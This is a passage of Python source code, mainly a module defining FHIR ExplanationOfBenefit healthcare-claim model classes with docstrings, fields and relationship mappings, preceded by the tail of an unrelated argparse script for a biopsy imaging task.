default=0,
help="maximum offset from central slice to consider as GT bounding box (default: 0)",
)
parser.add_argument(
"--only-biopsied",
default=True, # set to true by default for convenience
action="store_true",
help="flag to use only biopsied cases",
)
args = parser.parse_args()
main(args)
|
40567
|
from .fhirbase import fhirbase
class ExplanationOfBenefit(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
resourceType: This is a ExplanationOfBenefit resource
identifier: The EOB Business Identifier.
status: The status of the resource instance.
type: The category of claim, eg, oral, pharmacy, vision, insitutional,
professional.
subType: A finer grained suite of claim subtype codes which may convey
Inpatient vs Outpatient and/or a specialty service. In the US the
BillType.
patient: Patient Resource.
billablePeriod: The billable period for which charges are being
submitted.
created: The date when the EOB was created.
enterer: The person who created the explanation of benefit.
insurer: The insurer which is responsible for the explanation of
benefit.
provider: The provider which is responsible for the claim.
organization: The provider which is responsible for the claim.
referral: The referral resource which lists the date, practitioner,
reason and other supporting information.
facility: Facility where the services were provided.
claim: The business identifier for the instance: invoice number, claim
number, pre-determination or pre-authorization number.
claimResponse: The business identifier for the instance: invoice
number, claim number, pre-determination or pre-authorization number.
outcome: Processing outcome errror, partial or complete processing.
disposition: A description of the status of the adjudication.
related: Other claims which are related to this claim such as prior
claim versions or for related services.
prescription: Prescription to support the dispensing of Pharmacy or
Vision products.
originalPrescription: Original prescription which has been superceded
by this prescription to support the dispensing of pharmacy services,
medications or products. For example, a physician may prescribe a
medication which the pharmacy determines is contraindicated, or for
which the patient has an intolerance, and therefor issues a new
precription for an alternate medication which has the same theraputic
intent. The prescription from the pharmacy becomes the 'prescription'
and that from the physician becomes the 'original prescription'.
payee: The party to be reimbursed for the services.
information: Additional information codes regarding exceptions,
special considerations, the condition, situation, prior or concurrent
issues. Often there are mutiple jurisdiction specific valuesets which
are required.
careTeam: The members of the team who provided the overall service as
well as their role and whether responsible and qualifications.
diagnosis: Ordered list of patient diagnosis for which care is sought.
procedure: Ordered list of patient procedures performed to support the
adjudication.
precedence: Precedence (primary, secondary, etc.).
insurance: Financial instrument by which payment information for
health care.
accident: An accident which resulted in the need for healthcare
services.
employmentImpacted: The start and optional end dates of when the
patient was precluded from working due to the treatable condition(s).
hospitalization: The start and optional end dates of when the patient
was confined to a treatment center.
item: First tier of goods and services.
addItem: The first tier service adjudications for payor added
services.
totalCost: The total cost of the services reported.
unallocDeductable: The amount of deductable applied which was not
allocated to any particular service line.
totalBenefit: Total amount of benefit payable (Equal to sum of the
Benefit amounts from all detail lines and additions less the
Unallocated Deductable).
payment: Payment details for the claim if the claim has been paid.
form: The form to be used for printing the content.
processNote: Note text.
benefitBalance: Balance by Benefit Category.
"""
__name__ = 'ExplanationOfBenefit'
def __init__(self, dict_values=None):
self.resourceType = 'ExplanationOfBenefit'
# type: str
# possible values: ExplanationOfBenefit
self.status = None
# type: str
# possible values: active, cancelled, draft, entered-in-error
self.type = None
# reference to CodeableConcept
self.subType = None
# type: list
# reference to CodeableConcept
self.patient = None
# reference to Reference: identifier
self.billablePeriod = None
# reference to Period
self.created = None
# type: str
self.enterer = None
# reference to Reference: identifier
self.insurer = None
# reference to Reference: identifier
self.provider = None
# reference to Reference: identifier
self.organization = None
# reference to Reference: identifier
self.referral = None
# reference to Reference: identifier
self.facility = None
# reference to Reference: identifier
self.claim = None
# reference to Reference: identifier
self.claimResponse = None
# reference to Reference: identifier
self.outcome = None
# reference to CodeableConcept
self.disposition = None
# type: str
self.related = None
# type: list
# reference to ExplanationOfBenefit_Related
self.prescription = None
# reference to Reference: identifier
self.originalPrescription = None
# reference to Reference: identifier
self.payee = None
# reference to ExplanationOfBenefit_Payee
self.information = None
# type: list
# reference to ExplanationOfBenefit_Information
self.careTeam = None
# type: list
# reference to ExplanationOfBenefit_CareTeam
self.diagnosis = None
# type: list
# reference to ExplanationOfBenefit_Diagnosis
self.procedure = None
# type: list
# reference to ExplanationOfBenefit_Procedure
self.precedence = None
# type: int
self.insurance = None
# reference to ExplanationOfBenefit_Insurance
self.accident = None
# reference to ExplanationOfBenefit_Accident
self.employmentImpacted = None
# reference to Period
self.hospitalization = None
# reference to Period
self.item = None
# type: list
# reference to ExplanationOfBenefit_Item
self.addItem = None
# type: list
# reference to ExplanationOfBenefit_AddItem
self.totalCost = None
# reference to Money
self.unallocDeductable = None
# reference to Money
self.totalBenefit = None
# reference to Money
self.payment = None
# reference to ExplanationOfBenefit_Payment: identifier
self.form = None
# reference to CodeableConcept
self.processNote = None
# type: list
# reference to ExplanationOfBenefit_ProcessNote
self.benefitBalance = None
# type: list
# reference to ExplanationOfBenefit_BenefitBalance
self.identifier = None
# type: list
# reference to Identifier
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.status is not None:
for value in self.status:
if value is not None and value.lower() not in [
'active', 'cancelled', 'draft', 'entered-in-error']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'active, cancelled, draft, entered-in-error'))
def get_relationships(self):
return [
{'parent_entity': 'ExplanationOfBenefit_BenefitBalance',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'benefitBalance'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'prescription'},
{'parent_entity': 'ExplanationOfBenefit_AddItem',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'addItem'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'claimResponse'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'totalCost'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'unallocDeductable'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'provider'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'originalPrescription'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'subType'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'claim'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'totalBenefit'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'form'},
{'parent_entity': 'ExplanationOfBenefit_Procedure',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'procedure'},
{'parent_entity': 'ExplanationOfBenefit_Related',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'related'},
{'parent_entity': 'ExplanationOfBenefit_Insurance',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'insurance'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'type'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'patient'},
{'parent_entity': 'ExplanationOfBenefit_Information',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'information'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'hospitalization'},
{'parent_entity': 'ExplanationOfBenefit_Accident',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'accident'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'billablePeriod'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'referral'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'organization'},
{'parent_entity': 'ExplanationOfBenefit_ProcessNote',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'processNote'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'outcome'},
{'parent_entity': 'ExplanationOfBenefit_Item',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'item'},
{'parent_entity': 'ExplanationOfBenefit_Diagnosis',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'diagnosis'},
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'identifier'},
{'parent_entity': 'ExplanationOfBenefit_Payee',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'payee'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'insurer'},
{'parent_entity': 'ExplanationOfBenefit_Payment',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'payment'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'enterer'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'facility'},
{'parent_entity': 'ExplanationOfBenefit_CareTeam',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'careTeam'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit',
'child_variable': 'employmentImpacted'},
]
class ExplanationOfBenefit_Related(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
claim: Other claims which are related to this claim such as prior
claim versions or for related services.
relationship: For example prior or umbrella.
reference: An alternate organizational reference to the case or file
to which this particular claim pertains - eg Property/Casualy insurer
claim # or Workers Compensation case # .
"""
__name__ = 'ExplanationOfBenefit_Related'
def __init__(self, dict_values=None):
self.claim = None
# reference to Reference: identifier
self.relationship = None
# reference to CodeableConcept
self.reference = None
# reference to Identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Identifier',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Related',
'child_variable': 'reference'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Related',
'child_variable': 'claim'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Related',
'child_variable': 'relationship'},
]
class ExplanationOfBenefit_Payee(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
type: Type of Party to be reimbursed: Subscriber, provider, other.
resourceType: organization | patient | practitioner | relatedperson.
party: Party to be reimbursed: Subscriber, provider, other.
"""
__name__ = 'ExplanationOfBenefit_Payee'
def __init__(self, dict_values=None):
self.type = None
# reference to CodeableConcept
self.resourceType = None
# reference to CodeableConcept
self.party = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payee',
'child_variable': 'resourceType'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Payee',
'child_variable': 'party'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Payee',
'child_variable': 'type'},
]
class ExplanationOfBenefit_Information(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: Sequence of the information element which serves to provide
a link.
category: The general class of the information supplied: information;
exception; accident, employment; onset, etc.
code: System and code pertaining to the specific information regarding
special conditions relating to the setting, treatment or patient for
which care is sought which may influence the adjudication.
timingDate: The date when or period to which this information refers.
timingPeriod: The date when or period to which this information
refers.
valueString: Additional data or information such as resources,
documents, images etc. including references to the data or the actual
inclusion of the data.
valueQuantity: Additional data or information such as resources,
documents, images etc. including references to the data or the actual
inclusion of the data.
valueAttachment: Additional data or information such as resources,
documents, images etc. including references to the data or the actual
inclusion of the data.
valueReference: Additional data or information such as resources,
documents, images etc. including references to the data or the actual
inclusion of the data.
reason: For example, provides the reason for: the additional stay, or
missing tooth or any other situation where a reason code is required
in addition to the content.
"""
__name__ = 'ExplanationOfBenefit_Information'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.category = None
# reference to CodeableConcept
self.code = None
# reference to CodeableConcept
self.timingDate = None
# type: str
self.timingPeriod = None
# reference to Period
self.valueString = None
# type: str
self.valueQuantity = None
# reference to Quantity
self.valueAttachment = None
# reference to Attachment
self.valueReference = None
# reference to Reference: identifier
self.reason = None
# reference to Coding
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'valueReference'},
{'parent_entity': 'Attachment',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'valueAttachment'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'valueQuantity'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'code'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'reason'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'category'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Information',
'child_variable': 'timingPeriod'},
]
class ExplanationOfBenefit_CareTeam(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: Sequence of careteam which serves to order and provide a
link.
provider: The members of the team who provided the overall service.
responsible: The practitioner who is billing and responsible for the
claimed services rendered to the patient.
role: The lead, assisting or supervising practitioner and their
discipline if a multidisiplinary team.
qualification: The qualification which is applicable for this service.
"""
__name__ = 'ExplanationOfBenefit_CareTeam'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.provider = None
# reference to Reference: identifier
self.responsible = None
# type: bool
self.role = None
# reference to CodeableConcept
self.qualification = None
# reference to CodeableConcept
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_CareTeam',
'child_variable': 'provider'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_CareTeam',
'child_variable': 'role'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_CareTeam',
'child_variable': 'qualification'},
]
class ExplanationOfBenefit_Diagnosis(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: Sequence of diagnosis which serves to provide a link.
diagnosisCodeableConcept: The diagnosis.
diagnosisReference: The diagnosis.
type: The type of the Diagnosis, for example: admitting, primary,
secondary, discharge.
packageCode: The package billing code, for example DRG, based on the
assigned grouping code system.
"""
__name__ = 'ExplanationOfBenefit_Diagnosis'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.diagnosisCodeableConcept = None
# reference to CodeableConcept
self.diagnosisReference = None
# reference to Reference: identifier
self.type = None
# type: list
# reference to CodeableConcept
self.packageCode = None
# reference to CodeableConcept
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Diagnosis',
'child_variable': 'type'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Diagnosis',
'child_variable': 'diagnosisReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Diagnosis',
'child_variable': 'packageCode'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Diagnosis',
'child_variable': 'diagnosisCodeableConcept'},
]
class ExplanationOfBenefit_Procedure(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: Sequence of procedures which serves to order and provide a
link.
date: Date and optionally time the procedure was performed .
procedureCodeableConcept: The procedure code.
procedureReference: The procedure code.
"""
__name__ = 'ExplanationOfBenefit_Procedure'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.date = None
# type: str
self.procedureCodeableConcept = None
# reference to CodeableConcept
self.procedureReference = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Procedure',
'child_variable': 'procedureCodeableConcept'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Procedure',
'child_variable': 'procedureReference'},
]
class ExplanationOfBenefit_Insurance(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
coverage: Reference to the program or plan identification, underwriter
or payor.
preAuthRef: A list of references from the Insurer to which these
services pertain.
"""
__name__ = 'ExplanationOfBenefit_Insurance'
def __init__(self, dict_values=None):
self.coverage = None
# reference to Reference: identifier
self.preAuthRef = None
# type: list
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Insurance',
'child_variable': 'coverage'},
]
class ExplanationOfBenefit_Accident(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
date: Date of an accident which these services are addressing.
type: Type of accident: work, auto, etc.
locationAddress: Where the accident occurred.
locationReference: Where the accident occurred.
"""
__name__ = 'ExplanationOfBenefit_Accident'
def __init__(self, dict_values=None):
self.date = None
# type: str
self.type = None
# reference to CodeableConcept
self.locationAddress = None
# reference to Address
self.locationReference = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Accident',
'child_variable': 'locationAddress'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Accident',
'child_variable': 'locationReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Accident',
'child_variable': 'type'},
]
class ExplanationOfBenefit_Item(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: A service line number.
careTeamLinkId: Careteam applicable for this service or product line.
diagnosisLinkId: Diagnosis applicable for this service or product
line.
procedureLinkId: Procedures applicable for this service or product
line.
informationLinkId: Exceptions, special conditions and supporting
information pplicable for this service or product line.
revenue: The type of reveneu or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: If this is an actual service or product line, ie. not a
Group, then use code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI). If a
grouping item then use a group code to indicate the type of thing
being grouped eg. 'glasses' or 'compound'.
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
programCode: For programs which require reson codes for the inclusion,
covering, of this billed item under the program or sub-program.
servicedDate: The date or dates when the enclosed suite of services
were performed or completed.
servicedPeriod: The date or dates when the enclosed suite of services
were performed or completed.
locationCodeableConcept: Where the service was provided.
locationAddress: Where the service was provided.
locationReference: Where the service was provided.
quantity: The number of repetitions of a service or product.
unitPrice: If the item is a node then this is the fee for the product
or service, otherwise this is the total of the fees for the children
of the group.
factor: A real number that represents a multiplier used in determining
the overall value of services delivered and/or goods received. The
concept of a Factor allows for a discount or surcharge multiplier to
be applied to a monetary amount.
net: The quantity times the unit price for an addittional service or
product or charge. For example, the formula: unit Quantity * unit
Price (Cost per Point) * factor Number * points = net Amount.
Quantity, factor and points are assumed to be 1 if not supplied.
udi: List of Unique Device Identifiers associated with this line item.
bodySite: Physical service site on the patient (limb, tooth, etc).
subSite: A region or surface of the site, eg. limb region or tooth
surface(s).
encounter: A billed item may include goods or services provided in
multiple encounters.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
detail: Second tier of goods and services.
"""
__name__ = 'ExplanationOfBenefit_Item'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.careTeamLinkId = None
# type: list
self.diagnosisLinkId = None
# type: list
self.procedureLinkId = None
# type: list
self.informationLinkId = None
# type: list
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.programCode = None
# type: list
# reference to CodeableConcept
self.servicedDate = None
# type: str
self.servicedPeriod = None
# reference to Period
self.locationCodeableConcept = None
# reference to CodeableConcept
self.locationAddress = None
# reference to Address
self.locationReference = None
# reference to Reference: identifier
self.quantity = None
# reference to Quantity
self.unitPrice = None
# reference to Money
self.factor = None
# type: int
self.net = None
# reference to Money
self.udi = None
# type: list
# reference to Reference: identifier
self.bodySite = None
# reference to CodeableConcept
self.subSite = None
# type: list
# reference to CodeableConcept
self.encounter = None
# type: list
# reference to Reference: identifier
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.detail = None
# type: list
# reference to ExplanationOfBenefit_Detail
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'unitPrice'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'subSite'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'net'},
{'parent_entity': 'ExplanationOfBenefit_Detail',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'detail'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'programCode'},
{'parent_entity': 'Quantity',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'quantity'},
{'parent_entity': 'Period',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'servicedPeriod'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'adjudication'},
{'parent_entity': 'Address',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'locationAddress'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'service'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'bodySite'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'modifier'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'locationCodeableConcept'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'encounter'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'category'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'locationReference'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'revenue'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Item',
'child_variable': 'udi'},
]
class ExplanationOfBenefit_Adjudication(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
category: Code indicating: Co-Pay, deductable, elegible, benefit, tax,
etc.
reason: Adjudication reason such as limit reached.
amount: Monitory amount associated with the code.
value: A non-monetary value for example a percentage. Mutually
exclusive to the amount element above.
"""
__name__ = 'ExplanationOfBenefit_Adjudication'
def __init__(self, dict_values=None):
self.category = None
# reference to CodeableConcept
self.reason = None
# reference to CodeableConcept
self.amount = None
# reference to Money
self.value = None
# type: int
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Adjudication',
'child_variable': 'amount'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Adjudication',
'child_variable': 'category'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Adjudication',
'child_variable': 'reason'},
]
class ExplanationOfBenefit_Detail(fhirbase):
"""
This resource provides: the claim details; adjudication details from
the processing of a Claim; and optionally account balance information,
for informing the subscriber of the benefits provided.
Args:
sequence: A service line number.
type: The type of product or service.
revenue: The type of reveneu or cost center providing the product
and/or service.
category: Health Care Service Type Codes to identify the
classification of service or benefits.
service: If this is an actual service or product line, ie. not a
Group, then use code to indicate the Professional Service or Product
supplied (eg. CTP, HCPCS,USCLS,ICD10, NCPDP,DIN,ACHI,CCI). If a
grouping item then use a group code to indicate the type of thing
being grouped eg. 'glasses' or 'compound'.
modifier: Item typification or modifiers codes, eg for Oral whether
the treatment is cosmetic or associated with TMJ, or for medical
whether the treatment was outside the clinic or out of office hours.
programCode: For programs which require reson codes for the inclusion,
covering, of this billed item under the program or sub-program.
quantity: The number of repetitions of a service or product.
unitPrice: If the item is a node then this is the fee for the product
or service, otherwise this is the total of the fees for the children
of the group.
factor: A real number that represents a multiplier used in determining
the overall value of services delivered and/or goods received. The
concept of a Factor allows for a discount or surcharge multiplier to
be applied to a monetary amount.
net: The quantity times the unit price for an addittional service or
product or charge. For example, the formula: unit Quantity * unit
Price (Cost per Point) * factor Number * points = net Amount.
Quantity, factor and points are assumed to be 1 if not supplied.
udi: List of Unique Device Identifiers associated with this line item.
noteNumber: A list of note references to the notes provided below.
adjudication: The adjudications results.
subDetail: Third tier of goods and services.
"""
__name__ = 'ExplanationOfBenefit_Detail'
def __init__(self, dict_values=None):
self.sequence = None
# type: int
self.type = None
# reference to CodeableConcept
self.revenue = None
# reference to CodeableConcept
self.category = None
# reference to CodeableConcept
self.service = None
# reference to CodeableConcept
self.modifier = None
# type: list
# reference to CodeableConcept
self.programCode = None
# type: list
# reference to CodeableConcept
self.quantity = None
# reference to Quantity
self.unitPrice = None
# reference to Money
self.factor = None
# type: int
self.net = None
# reference to Money
self.udi = None
# type: list
# reference to Reference: identifier
self.noteNumber = None
# type: list
self.adjudication = None
# type: list
# reference to ExplanationOfBenefit_Adjudication
self.subDetail = None
# type: list
# reference to ExplanationOfBenefit_SubDetail
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
def get_relationships(self):
return [
{'parent_entity': 'ExplanationOfBenefit_SubDetail',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'subDetail'},
{'parent_entity': 'ExplanationOfBenefit_Adjudication',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'adjudication'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'service'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'unitPrice'},
{'parent_entity': 'Money',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'net'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'programCode'},
{'parent_entity': 'CodeableConcept',
'parent_variable': 'object_id',
'child_entity': 'ExplanationOfBenefit_Detail',
'child_variable': 'type'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'ExplanationOfBenefit_Detail',
